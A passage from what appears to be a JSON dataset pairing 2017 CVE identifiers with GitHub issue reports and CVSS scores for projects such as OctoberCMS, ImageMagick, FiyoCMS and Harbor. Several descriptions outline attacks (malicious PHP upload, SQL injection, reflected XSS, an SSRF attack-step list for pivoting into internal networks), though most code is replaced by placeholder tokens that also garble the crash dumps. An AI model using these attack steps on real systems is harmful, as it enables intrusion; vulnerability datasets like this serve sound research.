existing permissions if they make a major change like switching an in use UID/GID on a live system. APITAG is not mere sadism on my part; there really is no safe way to automate the necessary changes.) This affects both the init script and systemd service file: URLTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.0,
        "impactScore": 5.9,
        "exploitabilityScore": 1.0
    },
    {
        "CVE_ID": "CVE-2017-16941",
        "Issue_Url_old": "https://github.com/octobercms/october/issues/3257",
        "Issue_Url_new": "https://github.com/octobercms/october/issues/3257",
        "Repo_new": "octobercms/october",
        "Issue_Created_At": "2017-11-22T11:57:17Z",
        "description": "Octobercms left an arbitrary upload vulnerability in the latest version.. Expected behavior Well, dear sir, I just found an arbitrary upload vulnerability in Octobercms of the latest version. Reproduce steps When you login into the backend, you can visit\uff1a APITAG You can get the demo zip by export from demo theme, and now you have a zip file of demo. Then you can add two file into the zip file\uff0cone evil php file and one .htaccess file. .htaccess CODETAG FILETAG APITAG Now, I should upload the modified zip file , and import to cover the original demo theme folder. When I upload successful, I'll get an evil file here . Because of the new .htaccess file, I can visit the FILETAG file directly now, I can see the php infomation of the server. APITAG October build The latest version. Wish your response ,sir!",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-16942",
        "Issue_Url_old": "https://github.com/erikd/libsndfile/issues/341",
        "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/341",
        "Repo_new": "libsndfile/libsndfile",
        "Issue_Created_At": "2017-11-25T07:55:51Z",
        "description": "a div zero vul in function APITAG in libsndfile NUMBERTAG ubuntu NUMBERTAG source package in Ubuntu. PATHTAG gdb ./aubiomfcc GNU gdb APITAG NUMBERTAG APITAG NUMBERTAG Copyright (C NUMBERTAG Free Software Foundation, Inc. License GPL NUMBERTAG GNU GPL version NUMBERTAG or later APITAG This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type \"show copying\" and \"show warranty\" for details. This GDB was configured as NUMBERTAG linux gnu\". Type \"show configuration\" for configuration details. For bug reporting instructions, please see: APITAG . Find the GDB manual and other documentation resources online at: APITAG . For help, type \"help\". Type \"apropos word\" to search for commands related to \"word\"... Reading symbols from . APITAG (gdb) r i PATHTAG Starting program: PATHTAG i PATHTAG APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG Program received signal SIGFPE, Arithmetic exception NUMBERTAG ffff NUMBERTAG aaab in wav_w NUMBERTAG read_fmt_chunk (psf=psf APITAG fmtsize NUMBERTAG at APITAG NUMBERTAG bytespersec = (wav_fmt APITAG wav_fmt APITAG / wav_fmt APITAG ; (gdb) bt NUMBERTAG ffff NUMBERTAG aaab in wav_w NUMBERTAG read_fmt_chunk (psf=psf APITAG fmtsize NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG ca NUMBERTAG in wav_read_header ( framesperblock=<synthetic pointer>, blockalign=<synthetic pointer>, psf NUMBERTAG f0) at APITAG NUMBERTAG wav_open (psf=psf APITAG at APITAG NUMBERTAG ffff NUMBERTAG f4 in psf_open_file (psf NUMBERTAG f0, APITAG at APITAG NUMBERTAG ffff NUMBERTAG e0 in sf_open ( path=path APITAG \"hfl crash NUMBERTAG APITAG mode=mode APITAG APITAG at APITAG NUMBERTAG dc in new_aubio_source_sndfile ( APITAG \"hfl crash NUMBERTAG APITAG APITAG hop_size=hop_size APITAG at PATHTAG NUMBERTAG ERRORTAG a NUMBERTAG in new_aubio_source ( uri NUMBERTAG fffffffe NUMBERTAG hfl crash NUMBERTAG APITAG samplerate NUMBERTAG hop_size NUMBERTAG at PATHTAG NUMBERTAG in examples_common_init NUMBERTAG af in main () (gdb NUMBERTAG i $pc NUMBERTAG ffff NUMBERTAG aaab APITAG div %r9d NUMBERTAG ffff NUMBERTAG aaae APITAG cmp %edi,%ea NUMBERTAG ffff NUMBERTAG aab0 APITAG mov %eax,%ec NUMBERTAG ffff NUMBERTAG aab2 APITAG je NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG (gdb) i r ra NUMBERTAG f NUMBERTAG rb NUMBERTAG f NUMBERTAG rc NUMBERTAG rd NUMBERTAG rsi NUMBERTAG f NUMBERTAG rdi NUMBERTAG rbp NUMBERTAG rsp NUMBERTAG fffffffe0f NUMBERTAG fffffffe0f0 r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG rip NUMBERTAG ffff NUMBERTAG aaab NUMBERTAG ffff NUMBERTAG aaab APITAG eflags NUMBERTAG PF IF RF ] cs NUMBERTAG ss NUMBERTAG b NUMBERTAG ds NUMBERTAG es NUMBERTAG fs NUMBERTAG Type APITAG to continue, or q APITAG to quit",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-16961",
        "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/323",
        "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/323",
        "Repo_new": "bigtreecms/bigtree-cms",
        "Issue_Created_At": "2017-11-22T08:49:39Z",
        "description": "SQL injection in APITAG CMS NUMBERTAG SQL injection in APITAG CMS NUMBERTAG APITAG day. >I found a SQL injection vulnerability in APITAG CMS through APITAG vulnerability allows remote authenticated attackers to obtain information in the context of the user used by the application to retrieve data from the database. file in PATHTAG ERRORTAG values of the temp_tags parameters are not sanitized; and it is taken out of the database. so ,We can insert an attack statement into the table \uff0cthen access this point to complete the attack chain Poc: at first, add a trees ERRORTAG FILETAG if there are any questions, please send me the details to my email at EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-17054",
        "Issue_Url_old": "https://github.com/aubio/aubio/issues/148",
        "Issue_Url_new": "https://github.com/aubio/aubio/issues/148",
        "Repo_new": "aubio/aubio",
        "Issue_Created_At": "2017-11-28T06:12:00Z",
        "description": "a div zero vul in function APITAG in APITAG PATHTAG gdb ./aubioquiet GNU gdb APITAG NUMBERTAG APITAG NUMBERTAG Copyright (C NUMBERTAG Free Software Foundation, Inc. License GPL NUMBERTAG GNU GPL version NUMBERTAG or later APITAG This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type \"show copying\" and \"show warranty\" for details. This GDB was configured as NUMBERTAG linux gnu\". Type \"show configuration\" for configuration details. For bug reporting instructions, please see: APITAG . Find the GDB manual and other documentation resources online at: APITAG . For help, type \"help\". Type \"apropos word\" to search for commands related to \"word\"... Reading symbols from . APITAG (gdb) r i APITAG Starting program: PATHTAG i APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-17058",
        "Issue_Url_old": "https://github.com/woocommerce/woocommerce/issues/17964",
        "Issue_Url_new": "https://github.com/woocommerce/woocommerce/issues/17964",
        "Repo_new": "woocommerce/woocommerce",
        "Issue_Created_At": "2017-11-30T03:07:37Z",
        "description": "Does WC have a directory transversal vulnerability? . Hi there! A user brings this to our attention: URLTAG > The APITAG plugin through NUMBERTAG for APITAG has a Directory Traversal Vulnerability via a PATHTAG URI, which accesses a parent directory. Allegedly, \" When you dork with this,it will generate juciy information in parent directory , for best practice filter according to the country URLTAG .\"",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-17059",
        "Issue_Url_old": "https://github.com/NaturalIntelligence/wp-thumb-post/issues/1",
        "Issue_Url_new": "https://github.com/naturalintelligence/wp-thumb-post/issues/1",
        "Repo_new": "naturalintelligence/wp-thumb-post",
        "Issue_Created_At": "2017-11-23T08:21:21Z",
        "description": "APITAG APITAG NUMBERTAG Cross Site Scripting. The XSS reflected because the values are not filter correctly: APITAG Line NUMBERTAG APITAG \"> APITAG Line NUMBERTAG APITAG \"> [POC] POST PATHTAG (\"XSS\") APITAG NUMBERTAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Upgrade Insecure Requests NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Encoding: gzip, deflate, br Accept Language: es ES,es;q NUMBERTAG Cookie: Connection: close Content Type: application/x www form urlencoded Content Length NUMBERTAG amty_hidden NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-17102",
        "Issue_Url_old": "https://github.com/FiyoCMS/FiyoCMS/issues/9",
        "Issue_Url_new": "https://github.com/fiyocms/fiyocms/issues/9",
        "Repo_new": "fiyocms/fiyocms",
        "Issue_Created_At": "2017-12-03T08:14:32Z",
        "description": "SQL injection in APITAG NUMBERTAG Good day. I found a SQL injection vulnerability in APITAG APITAG vulnerability allows remote authenticated attackers to obtain information in the context of the user used by the application to retrieve data from the database. There is no need to login in when exploiting this vulnerability File location: FILETAG CODETAG Noticed that the function check_permalink Put the parameters $_REQUEST['link'] into the database query without filtered file: FILETAG ERRORTAG POC:",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-17103",
        "Issue_Url_old": "https://github.com/FiyoCMS/FiyoCMS/issues/10",
        "Issue_Url_new": "https://github.com/fiyocms/fiyocms/issues/10",
        "Repo_new": "fiyocms/fiyocms",
        "Issue_Created_At": "2017-12-03T13:35:20Z",
        "description": "an update SQL injection in APITAG NUMBERTAG Good day. I found an update type of SQL injection vulnerability in the APITAG APITAG vulnerability can lead to normal user privileges elevated to administrator privileges. the vulnerability lies in PATHTAG CODETAG it can be noticed that these two parameters $_POST FILETAG poc CODETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-17104",
        "Issue_Url_old": "https://github.com/FiyoCMS/FiyoCMS/issues/11",
        "Issue_Url_new": "https://github.com/fiyocms/fiyocms/issues/11",
        "Repo_new": "fiyocms/fiyocms",
        "Issue_Created_At": "2017-12-03T14:42:32Z",
        "description": "any file read vulnerability in APITAG NUMBERTAG Hi, I found an arbitrary file read vulnerability in APITAG NUMBERTAG It may cause the leakage of sensitive information. files in : PATHTAG CODETAG it can be noticed that $file is stitched together by $ _GET FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-17439",
        "Issue_Url_old": "https://github.com/heimdal/heimdal/issues/353",
        "Issue_Url_new": "https://github.com/heimdal/heimdal/issues/353",
        "Repo_new": "heimdal/heimdal",
        "Issue_Created_At": "2017-12-05T11:47:32Z",
        "description": "Remote unauthenticated APITAG in Heimdal KDC NUMBERTAG The following was reported in the Debian bug tracker at CVETAG heimdal kdc NUMBERTAG is regularly observed to crash due to malformed client names in client requests received over the internet. APITAG This leads to a segfault: ERRORTAG The related code is in PATHTAG APITAG Proposed patch: APITAG It would be good to have this fix, or another one, approved quickly so we can get a patch in Debian's security release.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-17479",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1044",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1044",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2017-12-08T07:29:36Z",
        "description": "Similar vulnerable functions related to CVETAG . There are two functions similar to vulnerable function with id CVETAG CVETAG url with issue id NUMBERTAG Below is the patch for CVETAG . URLTAG URLTAG FILETAG Below are two functions that similar to the vulnerable function NUMBERTAG PATHTAG (pgxtovolume) ERRORTAG FILETAG NUMBERTAG PATHTAG (pgxtoimage) ERRORTAG FILETAG I think there are vulnerabilities in those two functions, too. Therefore, there should be patches for those two functions.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-17484",
        "Issue_Url_old": "https://github.com/znc/znc/issues/1459",
        "Issue_Url_new": "https://github.com/znc/znc/issues/1459",
        "Repo_new": "znc/znc",
        "Issue_Created_At": "2017-11-21T10:48:01Z",
        "description": "\"stack smashing\" segmentation fault with znc git on arm NUMBERTAG h. I'm running znc git from the AUR on my ODROID XU4, running Arch Linux ARM, after adding arm NUMBERTAG h to the architecture field. Things were fine until I decided to update/rebuild yesterday. After between NUMBERTAG m NUMBERTAG h of being online, the service suddently stops. ERRORTAG Since this kept happening, I rebuilt the package again with debug symbols and have posted below the coredump. systemd coredump URLTAG I would report this in IRC, but none of my clients are set up for direct connection, only through my ZNC session. If there's any additional info which would be helpful, please just ask; I'll be more than happy to generate/provide it.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-17485",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/1855",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/1855",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2017-12-12T06:24:38Z",
        "description": "Placeholder for continuing serialization gadget fixing. Placeholder for further inclusions, to be included in NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-17497",
        "Issue_Url_old": "https://github.com/htacg/tidy-html5/issues/656",
        "Issue_Url_new": "https://github.com/htacg/tidy-html5/issues/656",
        "Repo_new": "htacg/tidy-html5",
        "Issue_Created_At": "2017-12-09T05:48:31Z",
        "description": "Segmentation Fault. Description The vulnerability is an incorrect access control. The variable APITAG at line NUMBERTAG in clean.c) is modified in the loop, but it does not check whether the new value is valid. When you enter the loop again, APITAG > next\u201dis invalid. So it causes the segmentation fault . Version APITAG Backtrace: CODETAG GDB Information CODETAG APITAG Contact me if you need Poc file at APITAG or APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-17504",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/872",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/872",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-11-21T05:39:48Z",
        "description": "heap buffer overflow in Magick_png_read_raw_profile. $ convert version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib fontconfig freetype jng jpeg pangocairo png x xml zlib commit: APITAG compile at ubuntu NUMBERTAG Trigger Command: convert Magick_png_read_raw_profile heap overflow /dev/null ERRORTAG testcase: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-17562",
        "Issue_Url_old": "https://github.com/embedthis/goahead/issues/249",
        "Issue_Url_new": "https://github.com/embedthis/goahead/issues/249",
        "Repo_new": "embedthis/goahead",
        "Issue_Created_At": "2017-06-09T19:11:15Z",
        "description": "CGI environment variables need a prefix. CGI variables from request queries and from POST data are passed to CGI programs. These variables correspond to the user parameters. There needs to be a prefix applied to avoid clashing with standard environment variables.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2017-17665",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/4073",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/4073",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2017-12-13T05:23:03Z",
        "description": "Machine update process doesn't check that the user has access to all environments. When an authenticated user has access to an environment that a machine is scoped to they can escalate that access by adding more environments that they have access to to that scope.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-17669",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/187",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/187",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2017-12-10T07:21:36Z",
        "description": "heap buffer overflow in APITAG Description There is a heap buffer overflow vulnerability in Exi NUMBERTAG The command is: ./exi NUMBERTAG POC Stack trace with asan: ERRORTAG Author Credit to Young_X MENTIONTAG IIE",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-17680",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/873",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/873",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-11-22T08:24:45Z",
        "description": "memory leak in APITAG memory. $ magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib fontconfig freetype jng jpeg lzma pangocairo png tiff x xml zlib Trigger Command: magick APITAG memory leak /dev/null ERRORTAG testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-17681",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/869",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/869",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-11-20T02:12:03Z",
        "description": "CPU exhaustion in APITAG Hello all. We found a denial of service APITAG issue in APITAG NUMBERTAG Q NUMBERTAG which can cause huge CPU consumption. (cpu NUMBERTAG The FILETAG is as following CODETAG convert APITAG cpu exhaustion /dev/null gdb backtrace ERRORTAG when debug we found a infinite loop in the following code (coders/psd.c). APITAG is always NUMBERTAG CODETAG testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-17682",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/870",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/870",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-11-20T02:37:26Z",
        "description": "cpu exhaustion in APITAG Hello all. We found a denial of service APITAG issue in APITAG NUMBERTAG Q NUMBERTAG which can cause huge CPU consumption. (cpu NUMBERTAG The FILETAG is as following CODETAG convert APITAG cpu exhaustion /dev/null gdb backtrace ERRORTAG When debug we found a very large number in APITAG ERRORTAG testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-17697",
        "Issue_Url_old": "https://github.com/vmware/harbor/issues/3755",
        "Issue_Url_new": "https://github.com/goharbor/harbor/issues/3755",
        "Repo_new": "goharbor/harbor",
        "Issue_Created_At": "2017-12-07T09:51:21Z",
        "description": "There is a SSRF security vulnerability. hello developers, there is a security vulnerability in file PATHTAG in APITAG function, in endpoint parameter\uff0cresult in a SSRF . SSRF \u00ad Server Side Request Forgery attacks. The ability to create requests from the vulnerable server to intra/internet The last place to send a request at file PATHTAG APITAG function ERRORTAG Send the request is as follows\uff1a > POST PATHTAG HTTP NUMBERTAG Host: APITAG > Connection: keep alive > Content Length NUMBERTAG Accept: application/json, text/javascript, / ; q NUMBERTAG Origin: FILETAG > User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Content Type: application/x www form urlencoded > Referer: URLTAG > Accept Encoding: gzip, deflate, br > Accept Language: zh CN,zh;q NUMBERTAG Cookie: language=zh CN; APITAG > > APITAG Send the request, the server will request URLTAG the port NUMBERTAG open or not open then Return different content, And lead to information disclosure FILETAG FILETAG APITAG \u00a0\u00a0attack\u00a0\u00a0steps NUMBERTAG Scan internal network to determine internal infrastructure which you may access NUMBERTAG Collect opened ports at localhost and other internal hosts which you want (basically by time\u00adbased determination NUMBERTAG Determine services/daemons on ports using wiki or daemons banners (if you may watch output NUMBERTAG Determine type of you SSRF combination: \u25cb Direct socket access (such as this example) \u25cb Sockets client (such as java URI, cURL, LWP, others NUMBERTAG In case of direct socket access determine CRLF and other injections for smuggling NUMBERTAG In case of sockets client, determine available URI schemas NUMBERTAG Compare available schemas and services/daemons protocols to find smuggling possibilities NUMBERTAG Determine host\u00adbased auth daemons and try to exploit it if there is a remote command execution vulnerability of the host in internal network\uff0cWe can use this vulnerability into Intranet\uff0cexample\uff1a > URLTAG the host in intranet will execute the command $( PATHTAG ) Vulnerability of SSRF bible Cheatsheet\uff1a FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 8.6,
        "impactScore": 4.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-17718",
        "Issue_Url_old": "https://github.com/ruby-ldap/ruby-net-ldap/issues/258",
        "Issue_Url_new": "https://github.com/ruby-ldap/ruby-net-ldap/issues/258",
        "Repo_new": "ruby-ldap/ruby-net-ldap",
        "Issue_Created_At": "2016-01-14T16:19:29Z",
        "description": "LDAPS vulnerable to MITM failure to validate hostname against CN or SAN in NUMBERTAG Cert. There are noted TLS/SSL limitations in the documented parts of the code and the info about encryption URLTAG . Technically, TLS/SSL also provides the ability to authenticate servers by matching the hostname to a CN (common name) or a (SAN) Subject Alternative Name and from what I've seen, while net ldap notes the certificate and trust chain limitations and insecure default, but it doesn't note the extra step needed to get to proper LDAP server authentication via LDAPS. CODETAG The above advice is not sufficient. It only assures that a server has a valid cert which was signed by a trusted CA, but it does not provide proof that it's the correct server E.g. APITAG could with a cert issued as APITAG could still impersonate APITAG to steal credentials. In addition to the above suggtestion setting a more secure and sane TLS/SSL context that validates certs , the net ldap lib should also, probably by default, add and make use of verify_certificate_identity URLTAG . I've browsed FILETAG and don't see anything that checks the hostname (FQDN) is authenticated against the certficate. ERRORTAG Given ruby essentially 'wraps' APITAG this Hostname_validation URLTAG reference also highlights the issue, with a choice extract > One common mistake made by users of APITAG is to assume that APITAG will validate the hostname in the server's certificate. Versions prior to NUMBERTAG did not perform hostname validation. Version NUMBERTAG and up contain support for hostname validation, but they still require the user to call a few functions to set it up.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2017-17724",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/263",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/263",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2018-04-04T08:16:47Z",
        "description": "out bound reads which could result to segmentfault. there are other testcases to trigger out of bound read with the commands (exi NUMBERTAG pv $POC), some debug information as follows: exi NUMBERTAG pv $POC Program received signal SIGSEGV, Segmentation fault. [ registers ] RA NUMBERTAG e RB NUMBERTAG ffff NUMBERTAG a2ed NUMBERTAG e2e2e ('...') RC NUMBERTAG RD NUMBERTAG f1fe RSI NUMBERTAG ffffffff RDI NUMBERTAG RBP NUMBERTAG fffffff2ce NUMBERTAG fffffff2ec NUMBERTAG fffffff NUMBERTAG a NUMBERTAG fffffff NUMBERTAG fffffff NUMBERTAG fffffff NUMBERTAG RSP NUMBERTAG fffffff2c NUMBERTAG ff7fe NUMBERTAG RIP NUMBERTAG ffff NUMBERTAG c NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG movzx eax,BYTE PTR [rax]) R NUMBERTAG R NUMBERTAG fe NUMBERTAG R NUMBERTAG ffff NUMBERTAG R NUMBERTAG R NUMBERTAG ffff NUMBERTAG a2ac NUMBERTAG ASCII') R NUMBERTAG fffffffe NUMBERTAG R NUMBERTAG R NUMBERTAG EFLAGS NUMBERTAG carry PARITY adjust zero sign trap INTERRUPT direction overflow) [ code NUMBERTAG ffff NUMBERTAG c NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG mov edx,DWORD PTR [rbp NUMBERTAG ffff NUMBERTAG c NUMBERTAG b APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG mov rax,QWORD PTR [rbp NUMBERTAG b NUMBERTAG ffff NUMBERTAG c NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG add rax,rd NUMBERTAG ffff NUMBERTAG c NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG movzx eax,BYTE PTR [ra NUMBERTAG ffff NUMBERTAG c NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG cmp al NUMBERTAG c NUMBERTAG ffff NUMBERTAG c NUMBERTAG a APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG jne NUMBERTAG ffff NUMBERTAG c NUMBERTAG APITAG unsigned ch ar const , unsigned long, unsigned int NUMBERTAG ffff NUMBERTAG c NUMBERTAG c APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG mov eax,DWORD PTR [rbp NUMBERTAG ffff NUMBERTAG c NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG mov rdx,QWORD PTR [rbp NUMBERTAG b8] [ stack NUMBERTAG fffffff2c NUMBERTAG ff7fe NUMBERTAG fffffff2c NUMBERTAG f NUMBERTAG fffffff2c NUMBERTAG e NUMBERTAG a NUMBERTAG fffffff2c NUMBERTAG fffffffe NUMBERTAG ffff NUMBERTAG e NUMBERTAG ffff NUMBERTAG afb0 APITAG mov rax,QWORD PTR [rip NUMBERTAG d NUMBERTAG ffff NUMBERTAG cb NUMBERTAG fffffff2c NUMBERTAG fffffff2c NUMBERTAG f1fef NUMBERTAG e NUMBERTAG fffffff2c NUMBERTAG ff8 ('.' <repeats NUMBERTAG times NUMBERTAG fffffff2c NUMBERTAG ffffbad NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGSEG NUMBERTAG ffff NUMBERTAG c NUMBERTAG in APITAG (out=..., bytes NUMBERTAG e NUMBERTAG I \", size NUMBERTAG f4, depth NUMBERTAG f) at APITAG NUMBERTAG while ( bytes[i NUMBERTAG c && i APITAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG ERRORTAG RDI NUMBERTAG fffffffe NUMBERTAG ffff NUMBERTAG e NUMBERTAG ffff NUMBERTAG afb0 APITAG mov rax,QWORD PTR [rip NUMBERTAG d NUMBERTAG ffff NUMBERTAG cb8) RBP NUMBERTAG fffffffd NUMBERTAG fffffffdb NUMBERTAG fffffffdd NUMBERTAG fffffffdf NUMBERTAG fffffffdf NUMBERTAG fffffffdfe0 ( > ...) RSP NUMBERTAG 